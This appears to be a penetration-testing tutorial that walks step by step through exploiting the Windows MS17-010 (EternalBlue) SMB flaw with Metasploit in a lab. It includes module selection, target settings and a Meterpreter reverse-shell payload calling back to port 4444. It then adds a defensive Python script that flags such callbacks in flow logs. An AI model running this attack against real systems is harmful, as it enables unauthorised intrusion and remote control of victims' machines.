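Kali Penetration Testing, Chapter 1: EternalBlue
Log in to Kali
Run sudo su and enter the kali user's password to switch to the root user
Initialize the Metasploit database with msfdb init
Then run msfconsole to start the tool
Once inside the tool
Use search to look up a vulnerability
The Microsoft EternalBlue vulnerability is ms17_010
Usage: search ms17_010
The search returns 4 modules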
#  Name                                      Disclosure Date  Rank     Check  Description
0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
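To select a module, enter use followed by its index or its full name, e.g. use 0 or use exploit/windows/smb/ms17_010_eternalblue
After selecting it, view the configuration with show options
Set the target IP with set RHOSTS <IP address>
After setting it, check the configuration again with show options
Once everything is configured, enter run to start the attack
After the attack completes, enter help to view the help information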
Explanation of the show options output
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.19.129   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.19.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
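Seen from the defending side, the settings above (RPORT 445 on the target, and a reverse_tcp payload that makes the target connect back to LHOST on LPORT 4444) leave a recognizable pattern in network flow logs: a host receives an SMB connection and shortly afterwards opens a connection back to the same peer. The Python code below is an added example, not part of the original article; the log format, the 60-second window and the function names are assumptions, and the sample records are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample flow records (not a real capture):
# time, source ip, source port, destination ip, destination port
SAMPLE_FLOWS = """\
2024-02-19T10:00:01 192.168.19.128 51514 192.168.19.129 445
2024-02-19T10:00:09 192.168.19.129 49158 192.168.19.128 4444
2024-02-19T10:03:00 192.168.19.50 50211 192.168.19.60 445
2024-02-19T10:20:00 192.168.19.60 49170 192.168.19.50 3389
2024-02-19T10:05:00 192.168.19.129 49160 192.168.19.1 53
"""

WINDOW = timedelta(seconds=60)  # assumed correlation window
DEFAULT_LPORT = 4444            # LPORT shown in the payload options above

def parse_flows(text):
    """Parse whitespace-separated flow lines; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
            flows.append((ts, parts[1], int(parts[2]), parts[3], int(parts[4])))
        except ValueError:
            continue
    return sorted(flows)  # chronological order, even if the log was not

def find_callbacks(flows, window=WINDOW):
    """Flag hosts that connect back to a peer soon after that peer reached their port 445."""
    last_smb = {}  # (client, server) -> time of the latest SMB connection
    alerts = []
    for ts, src, _sport, dst, dport in flows:
        if dport == 445:
            last_smb[(src, dst)] = ts
            continue
        seen = last_smb.get((dst, src))  # did dst recently open SMB to src?
        if seen is not None and ts - seen <= window:
            severity = "high" if dport == DEFAULT_LPORT else "medium"
            alerts.append({"host": src, "peer": dst, "port": dport, "severity": severity,
                           "delay_s": int((ts - seen).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

A callback on any port inside the window is reported as medium, because LPORT is configurable; only the default 4444 is raised to high.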
3406 2 2024-02-19